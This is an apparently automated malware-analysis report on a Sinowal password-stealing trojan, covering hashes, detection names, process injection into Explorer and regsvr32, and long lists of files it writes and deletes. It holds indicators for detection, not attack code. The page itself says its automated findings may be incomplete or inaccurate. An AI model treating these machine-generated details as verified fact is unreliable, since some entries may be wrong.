Sinowal_e278feec31

by malwarelabrobot on September 21st, 2015 in Malware Descriptions.

Susp_Dropper (Kaspersky), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, Sinowal.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, TrojanPSWZbot.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: e278feec31e3ed63cbe4a7d85517daea
SHA1: 040894a3e4f22f3189a850ff0a36c4c1ad63067d
SHA256: dc864301b3ed3e0fd2be94326b3fb581d1c627ef65247d5cfd8e8174ec1612f5
SSDeep: 6144:Yykr06hjRDWkYTZkdmqSymbyDGT5cM5RkgB809T3pU03HW2:YLr06nWkW8kymsGPqgz9Ty03HJ
Size: 269312 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-12 17:32:56
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-PSW. Trojan program intended for stealing users' passwords.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1480
mofcomp.exe:3476
WindowsXP-KB968930-x86-ENG.exe:3964
new.exe:3064
net1.exe:2460
tasklist.exe:2264
ngen.exe:3596
ngen.exe:3168
ngen.exe:3676
ngen.exe:3300
ngen.exe:856
ngen.exe:2988
ngen.exe:3172
ngen.exe:1960
ngen.exe:1944
ngen.exe:420
ngen.exe:916
ngen.exe:3936
ngen.exe:3996
ngen.exe:1868
ngen.exe:2188
ngen.exe:2952
ngen.exe:3560
ngen.exe:3224
ngen.exe:1724
ngen.exe:3220
ngen.exe:1976
ngen.exe:2164
ngen.exe:648
update.exe:4040
net.exe:2156
net.exe:2224
net.exe:2416
hostname.exe:1384
PSCustomSetupUtil.exe:620
PSCustomSetupUtil.exe:452
PSCustomSetupUtil.exe:3908
PSCustomSetupUtil.exe:1924
PSCustomSetupUtil.exe:2196
PSCustomSetupUtil.exe:3064
PSCustomSetupUtil.exe:2308
PSCustomSetupUtil.exe:2224
PSCustomSetupUtil.exe:3696
PSCustomSetupUtil.exe:3856
PSCustomSetupUtil.exe:2176
PSCustomSetupUtil.exe:2244
PSCustomSetupUtil.exe:2112
PSCustomSetupUtil.exe:2240
PSCustomSetupUtil.exe:3992
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:2344
PSCustomSetupUtil.exe:3952
PSCustomSetupUtil.exe:2552
PSCustomSetupUtil.exe:1496
PSCustomSetupUtil.exe:264
PSCustomSetupUtil.exe:1868
PSCustomSetupUtil.exe:1284
PSCustomSetupUtil.exe:2332
PSCustomSetupUtil.exe:2556
PSCustomSetupUtil.exe:2140
ipconfig.exe:1240
yfenaromaf.exe:1664
PSSetupNativeUtils.exe:1932
mscorsvw.exe:4008
mscorsvw.exe:3128
mscorsvw.exe:2592
mscorsvw.exe:2732
mscorsvw.exe:3104
mscorsvw.exe:2284
mscorsvw.exe:3484
mscorsvw.exe:2168
mscorsvw.exe:2072
mscorsvw.exe:3084
mscorsvw.exe:2408
mscorsvw.exe:828
regsvr32.exe:3404
regsvr32.exe:3200
wsmanhttpconfig.exe:3232
wsmanhttpconfig.exe:1960
netsh.exe:2304
bindata865.exe:3088

The Trojan injects its code into the following process(es):

new.exe:3664
regsvr32.exe:3384
regsvr32.exe:3264
Explorer.EXE:1572

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Olifiqtu\yfenaromaf.exe (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpfa60f4ad.bat (177 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (0 bytes)

The process mofcomp.exe:3476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:3964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ea4acb66495575d6b9f323\powershell_ise.exe (2526 bytes)
C:\ea4acb66495575d6b9f323\about_transactions.help.txt (1011 bytes)
C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (17 bytes)
C:\ea4acb66495575d6b9f323\wsmplpxy.dll (603 bytes)
C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (12 bytes)
C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (316 bytes)
C:\ea4acb66495575d6b9f323\about_jobs.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\$shtdwn$.req (788 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe (7339 bytes)
C:\ea4acb66495575d6b9f323\update\updspapi.dll (5940 bytes)
C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\ea4acb66495575d6b9f323\importallmodules.psd1 (438 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\winrm.vbs (2727 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\ea4acb66495575d6b9f323\update\update.exe (10748 bytes)
C:\ea4acb66495575d6b9f323\about_job_details.help.txt (824 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (950 bytes)
C:\ea4acb66495575d6b9f323\about_locations.help.txt (794 bytes)
C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (11 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.dll (1842 bytes)
C:\ea4acb66495575d6b9f323\about_return.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\spuninst.exe (3787 bytes)
C:\ea4acb66495575d6b9f323\about_remote.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\wevtfwd.dll (3351 bytes)
C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (16567 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (962 bytes)
C:\ea4acb66495575d6b9f323\about_arrays.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\about_trap.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\ea4acb66495575d6b9f323\about_break.help.txt (792 bytes)
C:\ea4acb66495575d6b9f323\registry.format.ps1xml (20 bytes)
C:\ea4acb66495575d6b9f323\spmsg.dll (495 bytes)
C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (133 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll (3118 bytes)
C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (590 bytes)
C:\ea4acb66495575d6b9f323\about_redirection.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\ea4acb66495575d6b9f323\about_aliases.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_operators.help.txt (770 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\ea4acb66495575d6b9f323\about_throw.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (21 bytes)
C:\ea4acb66495575d6b9f323\wsmwmipl.dll (2816 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (453 bytes)
C:\ea4acb66495575d6b9f323\wsmtxt.xsl (2 bytes)
C:\ea4acb66495575d6b9f323\winrm.cmd (35 bytes)
C:\ea4acb66495575d6b9f323\about_split.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\ea4acb66495575d6b9f323\about_history.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (13 bytes)
C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (837 bytes)
C:\ea4acb66495575d6b9f323\about_properties.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\pwrshplugin.dll (802 bytes)
C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (344 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (481 bytes)
C:\ea4acb66495575d6b9f323\about_signing.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\about_do.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\winrm.ini (1956 bytes)
C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\ea4acb66495575d6b9f323\help.format.ps1xml (3947 bytes)
C:\$Directory (800 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (168 bytes)
C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (14450 bytes)
C:\ea4acb66495575d6b9f323\winrshost.exe (22 bytes)
C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (887 bytes)
C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (411 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll (38414 bytes)
C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\winrsmgr.dll (2 bytes)
C:\ea4acb66495575d6b9f323\wsmprovhost.exe (657 bytes)
C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (379 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (26041 bytes)
C:\ea4acb66495575d6b9f323\about_functions.help.txt (586 bytes)
C:\ea4acb66495575d6b9f323\about_providers.help.txt (59 bytes)
C:\ea4acb66495575d6b9f323\wsmsvc.dll (15909 bytes)
C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (37 bytes)
C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (155 bytes)
C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (595 bytes)
C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\about_profiles.help.txt (457 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (16 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (1145 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe.mui (10 bytes)
C:\ea4acb66495575d6b9f323\about_for.help.txt (146 bytes)
C:\ea4acb66495575d6b9f323\winrs.exe (1154 bytes)
C:\ea4acb66495575d6b9f323\about_prompts.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\winrssrv.dll (12 bytes)
C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (146 bytes)
C:\ea4acb66495575d6b9f323\pwrshsip.dll (24 bytes)
C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (3386 bytes)
C:\ea4acb66495575d6b9f323\about_parsing.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (14 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll (5010 bytes)
C:\ea4acb66495575d6b9f323\update\spcustom.dll (23 bytes)
C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\ea4acb66495575d6b9f323\about_objects.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (659 bytes)
C:\ea4acb66495575d6b9f323\wsmres.dll (6164 bytes)
C:\ea4acb66495575d6b9f323\update (4 bytes)
C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_switch.help.txt (489 bytes)
C:\ea4acb66495575d6b9f323\about_methods.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\wsmpty.xsl (1 bytes)
C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (11 bytes)
C:\ea4acb66495575d6b9f323\update\eula.txt (586 bytes)
C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (405 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (562 bytes)
C:\ea4acb66495575d6b9f323\default.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (15 bytes)
C:\ea4acb66495575d6b9f323\about_continue.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (33 bytes)
C:\ea4acb66495575d6b9f323\profile.ps1 (772 bytes)
C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\ea4acb66495575d6b9f323\spupdsvc.exe (287 bytes)
C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (276 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\ea4acb66495575d6b9f323\about_scripts.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\ea4acb66495575d6b9f323\eventforwarding.adm (2 bytes)
C:\ea4acb66495575d6b9f323\about_foreach.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (1492 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.dll (591 bytes)
C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (266 bytes)
C:\ea4acb66495575d6b9f323\about_join.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_ref.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\winrscmd.dll (2907 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\types.ps1xml (2510 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\ea4acb66495575d6b9f323\about_while.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (574 bytes)
C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (3009 bytes)
C:\ea4acb66495575d6b9f323\update\update.inf (2457 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (3153 bytes)
C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (9 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (4 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\wtrinstaller.ico (4803 bytes)
C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (417 bytes)
C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (512 bytes)
C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (775 bytes)
C:\ea4acb66495575d6b9f323\about_variables.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\update\update.ver (14 bytes)
C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.mof (789 bytes)
C:\ea4acb66495575d6b9f323\about_requires.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.mof (4 bytes)
C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (221 bytes)
C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_scopes.help.txt (76 bytes)
C:\ea4acb66495575d6b9f323\pspluginwkr.dll (1756 bytes)
C:\ea4acb66495575d6b9f323\about_modules.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\about_if.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\pwrshmsg.dll (4 bytes)
C:\ea4acb66495575d6b9f323\about_parameters.help.txt (9 bytes)

The Trojan deletes the following file(s):

C:\ea4acb66495575d6b9f323\about_transactions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmplpxy.dll (0 bytes)
C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (0 bytes)
C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_return.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe (0 bytes)
C:\ea4acb66495575d6b9f323\update\updspapi.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\ea4acb66495575d6b9f323\importallmodules.psd1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.vbs (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_job_details.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_locations.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_jobs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\spuninst.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_arrays.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_trap.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_break.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\registry.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_throw.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_redirection.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmwmipl.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmtxt.xsl (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.cmd (0 bytes)
C:\ea4acb66495575d6b9f323\about_split.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\spmsg.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_history.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_aliases.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_properties.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_signing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_do.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.ini (0 bytes)
C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.exe (0 bytes)
C:\ea4acb66495575d6b9f323\help.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrshost.exe (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe.mui (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_parsing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmprovhost.exe (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\types.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions.help.txt (0 bytes)
C:\_521718_ (0 bytes)
C:\ea4acb66495575d6b9f323\about_providers.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmsvc.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshsip.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wevtfwd.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_profiles.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_for.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrs.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_prompts.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrssrv.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrsmgr.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\spcustom.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_objects.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrscmd.dll (0 bytes)
C:\ea4acb66495575d6b9f323\update (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_switch.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_methods.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmpty.xsl (0 bytes)
C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\eula.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\default.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_continue.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (0 bytes)
C:\ea4acb66495575d6b9f323\profile.ps1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\spupdsvc.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_scripts.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\eventforwarding.adm (0 bytes)
C:\ea4acb66495575d6b9f323\about_foreach.help.txt (0 bytes)
